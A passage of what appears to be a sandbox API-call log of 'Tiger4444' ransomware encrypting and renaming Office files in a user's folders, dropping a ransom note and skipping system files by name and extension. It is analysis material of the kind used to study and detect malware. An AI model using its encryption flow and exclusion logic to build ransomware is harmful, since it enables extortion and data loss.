[0047.155] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.156] CloseHandle (hObject=0x2c8) returned 1 [0047.156] CloseHandle (hObject=0x260) returned 1 [0047.156] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\xEqwtSKV7zLSf.pps.Tiger4444") returned 93 [0047.156] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\xEqwtSKV7zLSf.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\xeqwtskv7zlsf.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\xEqwtSKV7zLSf.pps.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\xeqwtskv7zlsf.pps.tiger4444"), dwFlags=0x1) returned 1 [0047.157] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=66464 | out: Addend=0xc6f980) returned 22295504 [0047.157] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4852 [0047.157] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833ef860, ftCreationTime.dwHighDateTime=0x1d4cdaf, ftLastAccessTime.dwLowDateTime=0xa1a4e550, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xa1a4e550, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x10399, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xEqwtSKV7zLSf.pps", cAlternateFileName="XEQWTS~1.PPS")) returned 0 [0047.157] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0047.157] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.157] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.157] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.157] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.158] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.158] CloseHandle (hObject=0x260) returned 1 [0047.158] CloseHandle (hObject=0x2ac) returned 1 [0047.158] GetCurrentThreadId () returned 0xfa8 [0047.158] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0047.158] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9" [0047.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83c90 | out: hHeap=0xc50000) returned 1 [0047.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0047.159] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9" [0047.159] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\" [0047.159] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\.BFC0E91B00AE8A0620D3" [0047.159] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.160] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.162] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.163] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.163] CloseHandle (hObject=0x2ac) returned 1 [0047.164] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9") returned 59 [0047.164] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.164] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58749930, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0x8fa46e60, ftLastAccessTime.dwHighDateTime=0x1d4cf48, ftLastWriteTime.dwLowDateTime=0x8120c202, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0047.164] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.164] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.164] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.164] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58749930, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0x8fa46e60, ftLastAccessTime.dwHighDateTime=0x1d4cf48, ftLastWriteTime.dwLowDateTime=0x8120c202, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.164] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.164] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.164] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.164] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.164] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.164] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8120c202, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8120c202, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8120c202, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.165] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.165] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.165] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5763a00, ftCreationTime.dwHighDateTime=0x1d4c6c6, ftLastAccessTime.dwLowDateTime=0xcaefb7f0, ftLastAccessTime.dwHighDateTime=0x1d4c8e9, ftLastWriteTime.dwLowDateTime=0xcaefb7f0, ftLastWriteTime.dwHighDateTime=0x1d4c8e9, nFileSizeHigh=0x0, nFileSizeLow=0x3c7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0ilze62eyGGp8o2xbiCL.pps", cAlternateFileName="0ILZE6~1.PPS")) returned 1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="Tiger4444.exe") returned -1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2=".") returned 1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="..") returned 1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="windows") returned -1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="bootmgr") returned -1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="pagefile.sys") returned -1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="boot") returned -1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="ids.txt") returned -1 [0047.165] lstrcmpiW (lpString1="0ilze62eyGGp8o2xbiCL.pps", lpString2="NTUSER.DAT") returned -1 [0047.165] lstrcpyW (in: lpString1=0x30aeb20, lpString2="0ilze62eyGGp8o2xbiCL.pps" | out: lpString1="0ilze62eyGGp8o2xbiCL.pps") returned="0ilze62eyGGp8o2xbiCL.pps" [0047.165] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\0ilze62eyGGp8o2xbiCL.pps", dwFileAttributes=0x0) returned 1 [0047.165] lstrlenW (lpString="0ilze62eyGGp8o2xbiCL.pps") returned 24 [0047.165] lstrlenW (lpString="Tiger4444") returned 9 [0047.165] lstrcmpiW (lpString1="xbiCL.pps", lpString2="Tiger4444") returned 1 [0047.165] lstrlenW (lpString=".dll") returned 4 [0047.165] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0047.165] lstrlenW (lpString=".lnk") returned 4 [0047.165] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0047.165] lstrlenW (lpString=".ini") returned 4 [0047.165] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0047.165] lstrlenW (lpString=".sys") returned 4 [0047.165] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0047.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\0ilze62eyGGp8o2xbiCL.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\0ilze62eyggp8o2xbicl.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.166] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.166] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13861874207) returned 1 [0047.166] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=15486) returned 1 [0047.166] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0047.166] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0047.166] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f80, lpName=0x0) returned 0x2c8 [0047.166] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f80) returned 0xbe0000 [0047.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0047.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0047.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0047.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0047.167] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13862056848) returned 1 [0047.168] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0047.168] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0047.168] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.168] CloseHandle (hObject=0x2c8) returned 1 [0047.168] CloseHandle (hObject=0x260) returned 1 [0047.168] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\0ilze62eyGGp8o2xbiCL.pps.Tiger4444") returned 94 [0047.169] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\0ilze62eyGGp8o2xbiCL.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\0ilze62eyggp8o2xbicl.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\0ilze62eyGGp8o2xbiCL.pps.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\0ilze62eyggp8o2xbicl.pps.tiger4444"), dwFlags=0x1) returned 1 [0047.169] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=15488 | out: Addend=0xc6f980) returned 22361968 [0047.169] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4854 [0047.169] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a5ceff0, ftCreationTime.dwHighDateTime=0x1d4d507, ftLastAccessTime.dwLowDateTime=0x3633f5c0, ftLastAccessTime.dwHighDateTime=0x1d4d54d, ftLastWriteTime.dwLowDateTime=0x3633f5c0, ftLastWriteTime.dwHighDateTime=0x1d4d54d, nFileSizeHigh=0x0, nFileSizeLow=0x1807a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7Zjtx91ByGcvrFKaZy.xls", cAlternateFileName="7ZJTX9~1.XLS")) returned 1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="Tiger4444.exe") returned -1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2=".") returned 1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="..") returned 1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="windows") returned -1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="bootmgr") returned -1 [0047.169] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="pagefile.sys") returned -1 [0047.170] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="boot") returned -1 [0047.170] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="ids.txt") returned -1 [0047.170] lstrcmpiW (lpString1="7Zjtx91ByGcvrFKaZy.xls", lpString2="NTUSER.DAT") returned -1 [0047.170] lstrcpyW (in: lpString1=0x30aeb20, lpString2="7Zjtx91ByGcvrFKaZy.xls" | out: lpString1="7Zjtx91ByGcvrFKaZy.xls") returned="7Zjtx91ByGcvrFKaZy.xls" [0047.170] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\7Zjtx91ByGcvrFKaZy.xls", dwFileAttributes=0x0) returned 1 [0047.170] lstrlenW (lpString="7Zjtx91ByGcvrFKaZy.xls") returned 22 [0047.170] lstrlenW (lpString="Tiger4444") returned 9 [0047.170] lstrcmpiW (lpString1="FKaZy.xls", lpString2="Tiger4444") returned -1 [0047.170] lstrlenW (lpString=".dll") returned 4 [0047.170] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.170] lstrlenW (lpString=".lnk") returned 4 [0047.170] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0047.170] lstrlenW (lpString=".ini") returned 4 [0047.170] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0047.170] lstrlenW (lpString=".sys") returned 4 [0047.170] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0047.170] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\7Zjtx91ByGcvrFKaZy.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\7zjtx91bygcvrfkazy.xls"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.170] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.170] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13862349808) returned 1 [0047.170] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=98426) returned 1 [0047.171] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0047.171] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0047.171] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18380, lpName=0x0) returned 0x2c8 [0047.171] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18380) returned 0xbe0000 [0047.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0047.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0047.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.173] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13862637855) returned 1 [0047.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0047.173] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0047.173] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.174] CloseHandle (hObject=0x2c8) returned 1 [0047.174] CloseHandle (hObject=0x260) returned 1 [0047.175] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\7Zjtx91ByGcvrFKaZy.xls.Tiger4444") returned 92 [0047.175] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\7Zjtx91ByGcvrFKaZy.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\7zjtx91bygcvrfkazy.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\7Zjtx91ByGcvrFKaZy.xls.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\7zjtx91bygcvrfkazy.xls.tiger4444"), dwFlags=0x1) returned 1 [0047.176] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=98432 | out: Addend=0xc6f980) returned 22377456 [0047.176] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4855 [0047.176] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc708a290, ftCreationTime.dwHighDateTime=0x1d4c750, ftLastAccessTime.dwLowDateTime=0x3cb58c10, ftLastAccessTime.dwHighDateTime=0x1d4c904, ftLastWriteTime.dwLowDateTime=0x3cb58c10, ftLastWriteTime.dwHighDateTime=0x1d4c904, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q9S3eEzzxB5rF.ots", cAlternateFileName="Q9S3EE~1.OTS")) returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="Tiger4444.exe") returned -1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2=".") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="..") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="windows") returned -1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="bootmgr") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="pagefile.sys") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="boot") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="ids.txt") returned 1 [0047.176] lstrcmpiW (lpString1="Q9S3eEzzxB5rF.ots", lpString2="NTUSER.DAT") returned 1 [0047.176] lstrcpyW (in: lpString1=0x30aeb20, lpString2="Q9S3eEzzxB5rF.ots" | out: lpString1="Q9S3eEzzxB5rF.ots") returned="Q9S3eEzzxB5rF.ots" [0047.176] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\Q9S3eEzzxB5rF.ots", dwFileAttributes=0x0) returned 1 [0047.176] lstrlenW (lpString="Q9S3eEzzxB5rF.ots") returned 17 [0047.177] lstrlenW (lpString="Tiger4444") returned 9 [0047.177] lstrcmpiW (lpString1="xB5rF.ots", lpString2="Tiger4444") returned 1 [0047.177] lstrlenW (lpString=".dll") returned 4 [0047.177] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0047.177] lstrlenW (lpString=".lnk") returned 4 [0047.177] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0047.177] lstrlenW (lpString=".ini") returned 4 [0047.177] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0047.177] lstrlenW (lpString=".sys") returned 4 [0047.177] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0047.177] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\Q9S3eEzzxB5rF.ots" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\q9s3eezzxb5rf.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.177] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.177] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13863004139) returned 1 [0047.177] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=11630) returned 1 [0047.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0047.177] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0047.177] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3070, lpName=0x0) returned 0x2c8 [0047.177] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3070) returned 0xbe0000 [0047.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, 